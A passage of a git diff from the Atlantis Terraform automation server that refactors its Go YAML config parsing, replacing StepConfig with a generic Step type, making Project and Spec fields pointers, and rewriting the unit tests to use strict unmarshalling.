-			act, err := r.ReadConfig(tmpDir)
-			Ok(t, err)
-			Equals(t, c.expOutput, act)
-		})
-	}
-}
+//func TestReadConfig_DirDoesNotExist(t *testing.T) {
+//	r := yaml.ParserValidator{}
+//	_, err := r.ReadConfig("/not/exist")
+//	Assert(t, os.IsNotExist(err), "exp nil ptr")
+//}
+//
+//func TestReadConfig_FileDoesNotExist(t *testing.T) {
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//
+//	r := yaml.ParserValidator{}
+//	_, err := r.ReadConfig(tmpDir)
+//	Assert(t, os.IsNotExist(err), "exp nil ptr")
+//}
+//
+//func TestReadConfig_BadPermissions(t *testing.T) {
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//	err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), nil, 0000)
+//	Ok(t, err)
+//
+//	r := yaml.ParserValidator{}
+//	_, err = r.ReadConfig(tmpDir)
+//	ErrContains(t, "unable to read atlantis.yaml file: ", err)
+//}
+//
+//func TestReadConfig_UnmarshalErrors(t *testing.T) {
+//	// We only have a few cases here because we assume the YAML library to be
+//	// well tested. See https://github.com/go-yaml/yaml/blob/v2/decode_test.go#L810.
+//	cases := []struct {
+//		description string
+//		input       string
+//		expErr      string
+//	}{
+//		{
+//			"random characters",
+//			"slkjds",
+//			"parsing atlantis.yaml: yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `slkjds` into yaml.Spec",
+//		},
+//		{
+//			"just a colon",
+//			":",
+//			"parsing atlantis.yaml: yaml: did not find expected key",
+//		},
+//	}
+//
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//
+//	for _, c := range cases {
+//		t.Run(c.description, func(t *testing.T) {
+//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+//			Ok(t, err)
+//			r := yaml.ParserValidator{}
+//			_, err = r.ReadConfig(tmpDir)
+//			ErrEquals(t, c.expErr, err)
+//		})
+//	}
+//}
+//
+//func TestReadConfig_Invalid(t *testing.T) {
+//	cases := []struct {
+//		description string
+//		input       string
+//		expErr      string
+//	}{
+//		// Invalid version.
+//		{
+//			description: "no version",
+//			input: `
+//projects:
+//- dir: "."
+//`,
+//			expErr: "unknown version: must have \"version: 2\" set",
+//		},
+//		{
+//			description: "unsupported version",
+//			input: `
+//version: 0
+//projects:
+//- dir: "."
+//`,
+//			expErr: "unknown version: must have \"version: 2\" set",
+//		},
+//		{
+//			description: "empty version",
+//			input: `
+//version: ~
+//projects:
+//- dir: "."
+//`,
+//			expErr: "unknown version: must have \"version: 2\" set",
+//		},
+//
+//		// No projects specified.
+//		{
+//			description: "no projects key",
+//			input:       `version: 2`,
+//			expErr:      "'projects' key must exist and contain at least one element",
+//		},
+//		{
+//			description: "empty projects list",
+//			input: `
+//version: 2
+//projects:`,
+//			expErr: "'projects' key must exist and contain at least one element",
+//		},
+//
+//		// Project must have dir set.
+//		{
+//			description: "project with no config",
+//			input: `
+//version: 2
+//projects:
+//-`,
+//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+//		},
+//		{
+//			description: "project without dir set",
+//			input: `
+//version: 2
+//projects:
+//- workspace: "staging"`,
+//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+//		},
+//		{
+//			description: "project with dir set to empty string",
+//			input: `
+//version: 2
+//projects:
+//- dir: ""`,
+//			expErr: "project at index 0 invalid: dir key must be set and non-empty",
+//		},
+//		{
+//			description: "project with no config at index 1",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//-`,
+//			expErr: "project at index 1 invalid: dir key must be set and non-empty",
+//		},
+//		{
+//			description: "project with unknown key",
+//			input: `
+//version: 2
+//projects:
+//- unknown: value`,
+//			expErr: "yaml: unmarshal errors:\n  line 4: field unknown not found in struct yaml.alias",
+//		},
+//	}
+//
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//
+//	for _, c := range cases {
+//		t.Run(c.description, func(t *testing.T) {
+//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+//			Ok(t, err)
+//
+//			r := yaml.ParserValidator{}
+//			_, err = r.ReadConfig(tmpDir)
+//			ErrEquals(t, "parsing atlantis.yaml: "+c.expErr, err)
+//		})
+//	}
+//}
+//
+//func TestReadConfig_Successes(t *testing.T) {
+//	basicProjects := []yaml.Project{
+//		{
+//			AutoPlan: &yaml.AutoPlan{
+//				Enabled:      true,
+//				WhenModified: []string{"**/*.tf"},
+//			},
+//			Workspace:         "default",
+//			TerraformVersion:  "",
+//			ApplyRequirements: nil,
+//			Workflow:          "",
+//			Dir:               ".",
+//		},
+//	}
+//
+//	cases := []struct {
+//		description string
+//		input       string
+//		expOutput   yaml.Spec
+//	}{
+//		{
+//			description: "uses project defaults",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//			},
+//		},
+//		{
+//			description: "autoplan is enabled by default",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//  auto_plan:
+//    when_modified: ["**/*.tf"]
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//			},
+//		},
+//		{
+//			description: "if workflows not defined, there are none",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//			},
+//		},
+//		{
+//			description: "if workflows key set but with no workflows there are none",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows: ~
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//			},
+//		},
+//		{
+//			description: "if a workflow is defined but set to null we use the defaults",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default: ~
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "init",
+//								},
+//								{
+//									StepType: "plan",
+//								},
+//							},
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "apply",
+//								},
+//							},
+//						},
+//					},
+//				},
+//			},
+//		},
+//		{
+//			description: "if a plan or apply has no steps defined then we use the defaults",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default:
+//    plan:
+//    apply:
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "init",
+//								},
+//								{
+//									StepType: "plan",
+//								},
+//							},
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "apply",
+//								},
+//							},
+//						},
+//					},
+//				},
+//			},
+//		},
+//		{
+//			description: "if a plan or apply explicitly defines an empty steps key then there are no steps",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default:
+//    plan:
+//      steps:
+//    apply:
+//      steps:
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: nil,
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: nil,
+//						},
+//					},
+//				},
+//			},
+//		},
+//		{
+//			description: "if steps are set then we parse them properly",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default:
+//    plan:
+//      steps:
+//      - init
+//      - plan
+//    apply:
+//      steps:
+//      - plan # we don't validate if they make sense
+//      - apply
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "init",
+//								},
+//								{
+//									StepType: "plan",
+//								},
+//							},
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "plan",
+//								},
+//								{
+//									StepType: "apply",
+//								},
+//							},
+//						},
+//					},
+//				},
+//			},
+//		},
+//		{
+//			description: "we parse extra_args for the steps",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default:
+//    plan:
+//      steps:
+//      - init:
+//          extra_args: []
+//      - plan:
+//          extra_args:
+//          - arg1
+//          - arg2
+//    apply:
+//      steps:
+//      - plan:
+//          extra_args: [a, b]
+//      - apply:
+//          extra_args: ["a", "b"]
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType:  "init",
+//									ExtraArgs: []string{},
+//								},
+//								{
+//									StepType:  "plan",
+//									ExtraArgs: []string{"arg1", "arg2"},
+//								},
+//							},
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType:  "plan",
+//									ExtraArgs: []string{"a", "b"},
+//								},
+//								{
+//									StepType:  "apply",
+//									ExtraArgs: []string{"a", "b"},
+//								},
+//							},
+//						},
+//					},
+//				},
+//			},
+//		},
+//		{
+//			description: "custom steps are parsed",
+//			input: `
+//version: 2
+//projects:
+//- dir: "."
+//workflows:
+//  default:
+//    plan:
+//      steps:
+//      - run: "echo \"plan hi\""
+//    apply:
+//      steps:
+//      - run: echo apply "arg 2"
+//`,
+//			expOutput: yaml.Spec{
+//				Version:  2,
+//				Projects: basicProjects,
+//				Workflows: map[string]yaml.Workflow{
+//					"default": {
+//						Plan: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "run",
+//									Run:      []string{"echo", "plan hi"},
+//								},
+//							},
+//						},
+//						Apply: &yaml.Stage{
+//							Steps: []yaml.Step{
+//								{
+//									StepType: "run",
+//									Run:      []string{"echo", "apply", "arg 2"},
+//								},
+//							},
+//						},
+//					},
+//				},
+//			},
+//		},
+//	}
+//
+//	tmpDir, cleanup := TempDir(t)
+//	defer cleanup()
+//
+//	for _, c := range cases {
+//		t.Run(c.description, func(t *testing.T) {
+//			err := ioutil.WriteFile(filepath.Join(tmpDir, "atlantis.yaml"), []byte(c.input), 0600)
+//			Ok(t, err)
+//
+//			r := yaml.ParserValidator{}
+//			act, err := r.ReadConfig(tmpDir)
+//			Ok(t, err)
+//			Equals(t, c.expOutput, act)
+//		})
+//	}
+//}
diff --git a/server/events/yaml/project.go b/server/events/yaml/project.go
index 7a5730665f..d6d7e89e6d 100644
--- a/server/events/yaml/project.go
+++ b/server/events/yaml/project.go
@@ -1,30 +1,10 @@
 package yaml
 
 type Project struct {
-	Dir               string   `yaml:"dir"`
-	Workspace         string   `yaml:"workspace"`
-	Workflow          string   `yaml:"workflow"`
-	TerraformVersion  string   `yaml:"terraform_version"`
-	AutoPlan          AutoPlan `yaml:"auto_plan,omitempty"`
-	ApplyRequirements []string `yaml:"apply_requirements"`
-}
-
-const DefaultWorkspace = "default"
-
-func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// Use a type alias so unmarshal doesn't get into an infinite loop.
-	type alias Project
-	// Set up defaults.
-	defaults := alias{
-		Workspace: DefaultWorkspace,
-		AutoPlan: AutoPlan{
-			Enabled:      true,
-			WhenModified: []string{"**/*.tf"},
-		},
-	}
-	if err := unmarshal(&defaults); err != nil {
-		return err
-	}
-	*p = Project(defaults)
-	return nil
+	Dir               *string   `yaml:"dir,omitempty"`
+	Workspace         *string   `yaml:"workspace,omitempty"`
+	Workflow          *string   `yaml:"workflow,omitempty"`
+	TerraformVersion  *string   `yaml:"terraform_version,omitempty"`
+	AutoPlan          *AutoPlan `yaml:"auto_plan,omitempty"`
+	ApplyRequirements []string  `yaml:"apply_requirements,omitempty"`
 }
diff --git a/server/events/yaml/project_test.go b/server/events/yaml/project_test.go
index c3ab94d1db..0827bee733 100644
--- a/server/events/yaml/project_test.go
+++ b/server/events/yaml/project_test.go
@@ -15,23 +15,19 @@ func TestProject_UnmarshalYAML(t *testing.T) {
 		exp         yaml.Project
 	}{
 		{
-			description: "should use defaults",
-			input: `
-dir: .`,
+			description: "omit unset fields",
+			input:       "",
 			exp: yaml.Project{
-				Dir:              ".",
-				Workspace:        "default",
-				Workflow:         "",
-				TerraformVersion: "",
-				AutoPlan: &yaml.AutoPlan{
-					WhenModified: []string{"**/*.tf"},
-					Enabled:      true,
-				},
+				Dir:               nil,
+				Workspace:         nil,
+				Workflow:          nil,
+				TerraformVersion:  nil,
+				AutoPlan:          nil,
 				ApplyRequirements: nil,
 			},
 		},
 		{
-			description: "should use all set fields",
+			description: "all fields set",
 			input: `
 dir: mydir
 workspace: workspace
@@ -43,13 +39,13 @@ auto_plan:
 apply_requirements:
 - mergeable`,
 			exp: yaml.Project{
-				Dir:              "mydir",
-				Workspace:        "workspace",
-				Workflow:         "workflow",
-				TerraformVersion: "v0.11.0",
+				Dir:              String("mydir"),
+				Workspace:        String("workspace"),
+				Workflow:         String("workflow"),
+				TerraformVersion: String("v0.11.0"),
 				AutoPlan: &yaml.AutoPlan{
 					WhenModified: []string{},
-					Enabled:      false,
+					Enabled:      Bool(false),
 				},
 				ApplyRequirements: []string{"mergeable"},
 			},
@@ -59,7 +55,7 @@ apply_requirements:
 	for _, c := range cases {
 		t.Run(c.description, func(t *testing.T) {
 			var p yaml.Project
-			err := yamlv2.Unmarshal([]byte(c.input), &p)
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &p)
 			Ok(t, err)
 			Equals(t, c.exp, p)
 		})
diff --git a/server/events/yaml/spec.go b/server/events/yaml/spec.go
new file mode 100644
index 0000000000..874877f766
--- /dev/null
+++ b/server/events/yaml/spec.go
@@ -0,0 +1,7 @@
+package yaml
+
+type Spec struct {
+	Version   *int                `yaml:"version,omitempty"`
+	Projects  []Project           `yaml:"projects,omitempty"`
+	Workflows map[string]Workflow `yaml:"workflows,omitempty"`
+}
diff --git a/server/events/yaml/spec_test.go b/server/events/yaml/spec_test.go
new file mode 100644
index 0000000000..6106e22a27
--- /dev/null
+++ b/server/events/yaml/spec_test.go
@@ -0,0 +1,152 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestConfig_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Spec
+		expErr      string
+	}{
+		{
+			description: "no data",
+			input:       "",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "yaml nil",
+			input:       "~",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "invalid key",
+			input:       "invalid: key",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 1: field invalid not found in struct yaml.Spec",
+		},
+		{
+			description: "version set",
+			input:       "version: 2",
+			exp: yaml.Spec{
+				Version:   Int(2),
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "projects key without value",
+			input:       "projects:",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "workflows key without value",
+			input:       "workflows:",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+		},
+		{
+			description: "projects with a map",
+			input:       "projects:\n  key: value",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 2: cannot unmarshal !!map into []yaml.Project",
+		},
+		{
+			description: "projects with a scalar",
+			input:       "projects: value",
+			exp: yaml.Spec{
+				Version:   nil,
+				Projects:  nil,
+				Workflows: nil,
+			},
+			expErr: "yaml: unmarshal errors:\n  line 1: cannot unmarshal !!str `value` into []yaml.Project",
+		},
+		{
+			description: "should use values if set",
+			input: `
+version: 2
+projects:
+- dir: mydir
+  workspace: myworkspace
+  workflow: default
+  terraform_version: v0.11.0
+  auto_plan:
+    enabled: false
+    when_modified: []
+  apply_requirements: [mergeable]
+workflows:
+  default:
+    plan:
+      steps: []
+    apply:
+     steps: []`,
+			exp: yaml.Spec{
+				Version: Int(2),
+				Projects: []yaml.Project{
+					{
+						Dir:              String("mydir"),
+						Workspace:        String("myworkspace"),
+						Workflow:         String("default"),
+						TerraformVersion: String("v0.11.0"),
+						AutoPlan: &yaml.AutoPlan{
+							WhenModified: []string{},
+							Enabled:      Bool(false),
+						},
+						ApplyRequirements: []string{"mergeable"},
+					},
+				},
+				Workflows: map[string]yaml.Workflow{
+					"default": {
+						Apply: &yaml.Stage{
+							Steps: []yaml.Step{},
+						},
+						Plan: &yaml.Stage{
+							Steps: []yaml.Step{},
+						},
+					},
+				},
+			},
+		},
+	}
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var conf yaml.Spec
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &conf)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, conf)
+		})
+	}
+}
diff --git a/server/events/yaml/stage.go b/server/events/yaml/stage.go
index 7c84323b55..be342403f6 100644
--- a/server/events/yaml/stage.go
+++ b/server/events/yaml/stage.go
@@ -1,5 +1,5 @@
 package yaml
 
 type Stage struct {
-	Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi'
+	Steps []Step `yaml:"steps,omitempty"`
 }
diff --git a/server/events/yaml/stage_test.go b/server/events/yaml/stage_test.go
new file mode 100644
index 0000000000..ffcebe1a5a
--- /dev/null
+++ b/server/events/yaml/stage_test.go
@@ -0,0 +1,47 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestStage_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Stage
+	}{
+		{
+			description: "empty",
+			input:       "",
+			exp: yaml.Stage{
+				Steps: nil,
+			},
+		},
+		{
+			description: "all fields set",
+			input: `
+steps: [step1]
+`,
+			exp: yaml.Stage{
+				Steps: []yaml.Step{
+					{
+						Key: String("step1"),
+					},
+				},
+			},
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var a yaml.Stage
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &a)
+			Ok(t, err)
+			Equals(t, c.exp, a)
+		})
+	}
+}
diff --git a/server/events/yaml/step.go b/server/events/yaml/step.go
new file mode 100644
index 0000000000..f8c09d9bc0
--- /dev/null
+++ b/server/events/yaml/step.go
@@ -0,0 +1,61 @@
+package yaml
+
+// Step represents a single action/command to perform. In YAML, it can be set as
+// 1. A single string for a built-in command:
+//    - init
+//    - plan
+// 2. A map for a built-in command and extra_args:
+//    - plan:
+//        extra_args: [-var-file=staging.tfvars]
+// 3. A map for a custom run command:
+//    - run: my custom command
+// Here we parse step in the most generic fashion possible. See fields for more
+// details.
+type Step struct {
+	// Key will be set in case #1 and #3 above to the key. In case #2, there
+	// could be multiple keys (since the element is a map) so we don't set Key.
+	Key *string
+	// Map will be set in case #2 above.
+	Map map[string]map[string][]string
+	// StringVal will be set in case #3 above.
+	StringVal map[string]string
+}
+
+func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error {
+	// First try to unmarshal as a single string, ex.
+	// steps:
+	// - init
+	// - plan
+	// We validate if it's a legal string later.
+	var singleString string
+	err := unmarshal(&singleString)
+	if err == nil {
+		s.Key = &singleString
+		return nil
+	}
+
+	// This represents a step with extra_args, ex:
+	//   init:
+	//     extra_args: [a, b]
+	// We validate if there's a single key in the map and if the value is a
+	// legal value later.
+	var step map[string]map[string][]string
+	err = unmarshal(&step)
+	if err == nil {
+		s.Map = step
+		return nil
+	}
+
+	// Try to unmarshal as a custom run step, ex.
+	// steps:
+	// - run: my command
+	// We validate if the key is run later.
+	var runStep map[string]string
+	err = unmarshal(&runStep)
+	if err == nil {
+		s.StringVal = runStep
+		return nil
+	}
+
+	return err
+}
diff --git a/server/events/yaml/step_config.go b/server/events/yaml/step_config.go
deleted file mode 100644
index f6e7713c0f..0000000000
--- a/server/events/yaml/step_config.go
+++ /dev/null
@@ -1,82 +0,0 @@
-package yaml
-
-import (
-	"fmt"
-
-	"github.com/flynn-archive/go-shlex"
-	"github.com/pkg/errors"
-)
-
-type StepConfig struct {
-	StepType  string
-	ExtraArgs []string
-	// Run will be set if the StepType is "run". This is for custom commands.
-	// Ex. if the key is `run: echo hi` then Run will be "echo hi".
-	Run []string
-}
-
-func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// First try to unmarshal as a single string, ex.
-	// steps:
-	// - init
-	// - plan
-	var singleString string
-	err := unmarshal(&singleString)
-	if err == nil {
-		if singleString != "init" && singleString != "plan" && singleString != "apply" {
-			return fmt.Errorf("unsupported step type: %q", singleString)
-		}
-		s.StepType = singleString
-		return nil
-	}
-
-	// This represents a step with extra_args, ex:
-	//   init:
-	//     extra_args: [a, b]
-	var step map[string]map[string][]string
-	if err = unmarshal(&step); err == nil {
-		if len(step) != 1 {
-			return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val")
-		}
-
-		for k, v := range step {
-			if k != "init" && k != "plan" && k != "apply" {
-				return fmt.Errorf("unsupported step %q", k)
-			}
-
-			extraArgs, ok := v["extra_args"]
-			if !ok {
-				return errors.New("the only supported key for a step is 'extra_args'")
-			}
-
-			s.StepType = k
-			s.ExtraArgs = extraArgs
-			return nil
-		}
-	}
-
-	// Try to unmarshal as a custom run step, ex.
-	// steps:
-	// - run: my command
-	var runStep map[string]string
-	if err = unmarshal(&runStep); err == nil {
-		if len(runStep) != 1 {
-			return errors.New("each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val")
-		}
-
-		for k, v := range runStep {
-			if k != "run" {
-				return fmt.Errorf("unsupported step %q", k)
-			}
-
-			s.StepType = "run"
-			parts, err := shlex.Split(v)
-			if err != nil {
-				return err
-			}
-			s.Run = parts
-		}
-	}
-
-	return err
-}
diff --git a/server/events/yaml/step_config_test.go b/server/events/yaml/step_config_test.go
deleted file mode 100644
index c75777ba53..0000000000
--- a/server/events/yaml/step_config_test.go
+++ /dev/null
@@ -1,159 +0,0 @@
-package yaml_test
-
-import (
-	"testing"
-
-	"github.com/runatlantis/atlantis/server/events/yaml"
-	. "github.com/runatlantis/atlantis/testing"
-	yamlv2 "gopkg.in/yaml.v2"
-)
-
-func TestStepConfig_UnmarshalYAML(t *testing.T) {
-	cases := []struct {
-		description string
-		input       string
-		exp         yaml.StepConfig
-		expErr      string
-	}{
-
-		//Single string.
-		{
-			description: "should parse just init",
-			input:       `init`,
-			exp: yaml.StepConfig{
-				StepType: "init",
-			},
-		},
-		{
-			description: "should parse just plan",
-			input:       `plan`,
-			exp: yaml.StepConfig{
-				StepType: "plan",
-			},
-		},
-		{
-			description: "should parse just apply",
-			input:       `apply`,
-			exp: yaml.StepConfig{
-				StepType: "apply",
-			},
-		},
-
-		// With extra_args.
-		{
-			description: "should parse init with extra_args",
-			input: `
-init:
-  extra_args: [arg1, arg2]`,
-			exp: yaml.StepConfig{
-				StepType:  "init",
-				ExtraArgs: []string{"arg1", "arg2"},
-			},
-		},
-		{
-			description: "should parse plan with extra_args",
-			input: `
-plan:
-  extra_args: [arg1, arg2]`,
-			exp: yaml.StepConfig{
-				StepType:  "plan",
-				ExtraArgs: []string{"arg1", "arg2"},
-			},
-		},
-		{
-			description: "should parse apply with extra_args",
-			input: `
-apply:
-  extra_args: [arg1, arg2]`,
-			exp: yaml.StepConfig{
-				StepType:  "apply",
-				ExtraArgs: []string{"arg1", "arg2"},
-			},
-		},
-
-		// extra_args with non-strings.
-		{
-			description: "should convert non-string extra_args into strings",
-			input: `
-init:
-  extra_args: [1]`,
-			exp: yaml.StepConfig{
-				StepType:  "init",
-				ExtraArgs: []string{"1"},
-			},
-		},
-		{
-			description: "should convert non-string extra_args into strings",
-			input: `
-plan:
-  extra_args: [true]`,
-			exp: yaml.StepConfig{
-				StepType:  "plan",
-				ExtraArgs: []string{"true"},
-			},
-		},
-
-		// Custom run step.
-		{
-			description: "should allow for custom run steps",
-			input: `
-run: echo my command`,
-			exp: yaml.StepConfig{
-				StepType: "run",
-				Run:      []string{"echo", "my", "command"},
-			},
-		},
-		{
-			description: "should split words correctly in run step",
-			input: `
-run: echo 'my command'`,
-			exp: yaml.StepConfig{
-				StepType: "run",
-				Run:      []string{"echo", "my command"},
-			},
-		},
-
-		// Invalid steps
-		{
-			description: "should error when element is a map",
-			input: `
-key1: val
-key2: val`,
-			expErr: "each step can have only one map key, you probably have something like:\nsteps:\n  - key1: val\n    key2: val",
-		},
-		{
-			description: "should error when unrecognized step is used",
-			input: `
-invalid: val
-`,
-			expErr: "unsupported step \"invalid\"",
-		},
-		{
-			description: "should error when unrecognized step is used",
-			input: `
-invalid:
-  extra_args: []
-`,
-			expErr: "unsupported step \"invalid\"",
-		},
-		{
-			description: "should error when unrecognized step is used",
-			input: `
-run: []`,
-			expErr: "yaml: unmarshal errors:\n  line 2: cannot unmarshal !!seq into string",
-		},
-	}
-
-	for _, c := range cases {
-		t.Run(c.description, func(t *testing.T) {
-			var got yaml.StepConfig
-			err := yamlv2.Unmarshal([]byte(c.input), &got)
-			if c.expErr != "" {
-				ErrEquals(t, c.expErr, err)
-				return
-			}
-			Ok(t, err)
-			Equals(t, c.exp, got)
-		})
-	}
-}
diff --git a/server/events/yaml/step_test.go b/server/events/yaml/step_test.go
new file mode 100644
index 0000000000..4bdb6f33ec
--- /dev/null
+++ b/server/events/yaml/step_test.go
@@ -0,0 +1,134 @@
+package yaml_test
+
+import (
+	"testing"
+
+	"github.com/runatlantis/atlantis/server/events/yaml"
+	. "github.com/runatlantis/atlantis/testing"
+	yamlv2 "gopkg.in/yaml.v2"
+)
+
+func TestStepConfig_UnmarshalYAML(t *testing.T) {
+	cases := []struct {
+		description string
+		input       string
+		exp         yaml.Step
+		expErr      string
+	}{
+
+		// Single string.
+		{
+			description: "single string",
+			input:       `astring`,
+			exp: yaml.Step{
+				Key: String("astring"),
+			},
+		},
+
+		// map[string]map[string][]string i.e. extra_args style.
+		{
+			description: "extra_args style",
+			input: `
+key:
+  mapValue: [arg1, arg2]`,
+			exp: yaml.Step{
+				Map: map[string]map[string][]string{
+					"key": {
+						"mapValue": {"arg1", "arg2"},
+					},
+				},
+			},
+		},
+		{
+			description: "extra_args style multiple keys",
+			input: `
+key:
+  mapValue: [arg1, arg2]
+  value2: []`,
+			exp: yaml.Step{
+				Map: map[string]map[string][]string{
+					"key": {
+						"mapValue": {"arg1", "arg2"},
+						"value2":   {},
+					},
+				},
+			},
+		},
+		{
+			description: "extra_args style multiple top-level keys",
+			input: `
+key:
+  val1: []
+key2:
+  val2: []`,
+			exp: yaml.Step{
+				Map: map[string]map[string][]string{
+					"key": {
+						"val1": {},
+					},
+					"key2": {
+						"val2": {},
+					},
+				},
+			},
+		},
+
+		// Run-step style
+		{
+			description: "run step",
+			input: `
+run: my command`,
+			exp: yaml.Step{
+				StringVal: map[string]string{
+					"run": "my command",
+				},
+			},
+		},
+		{
+			description: "run step multiple top-level keys",
+			input: `
+run: my command
+key: value`,
+			exp: yaml.Step{
+				StringVal: map[string]string{
+					"run": "my command",
+					"key": "value",
+				},
+			},
+		},
+
+		// Empty
+		{
+			description: "empty",
+			input:       "",
+			exp: yaml.Step{
+				Key:       nil,
+				Map:       nil,
+				StringVal: nil,
+			},
+		},
+
+		// Errors
+		{
+			description: "extra args style no slice strings",
+			input: `
+key:
+  value:
+    another: map`,
+			expErr: "yaml: unmarshal errors:\n  line 3: cannot unmarshal !!map into string",
+		},
+	}
+
+	for _, c := range cases {
+		t.Run(c.description, func(t *testing.T) {
+			var got yaml.Step
+			err := yamlv2.UnmarshalStrict([]byte(c.input), &got)
+			if c.expErr != "" {
+				ErrEquals(t, c.expErr, err)
+				return
+			}
+			Ok(t, err)
+			Equals(t, c.exp, got)
+		})
+	}
+}
diff --git a/server/events/yaml/workflow.go b/server/events/yaml/workflow.go
index 97055cb3da..0dd069c648 100644
--- a/server/events/yaml/workflow.go
+++ b/server/events/yaml/workflow.go
@@ -1,60 +1,6 @@
 package yaml
 
-import "errors"
-
 type Workflow struct {
-	Apply *Stage `yaml:"apply"` // defaults to regular apply steps
-	Plan  *Stage `yaml:"plan"`  // defaults to regular plan steps
-}
-
-func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error {
-	// Check if they forgot to set the "steps" key and just started listing
-	// steps, ex.
-	//  plan:
-	//    - init
-	//    - plan
-	type MissingSteps struct {
-		Apply []interface{}
-		Plan  []interface{}
-	}
-	var missingSteps MissingSteps
-	// This will pass if they've just set the key to null, which we don't want
-	// since in that case we use the defaults to we also check if the len > 0.
-	if err := unmarshal(&missingSteps); err == nil && (len(missingSteps.Apply) > 0 || len(missingSteps.Plan) > 0) {
-		return errors.New("missing \"steps\" key")
-	}
-
-	// Use a type alias so unmarshal doesn't get into an infinite loop.
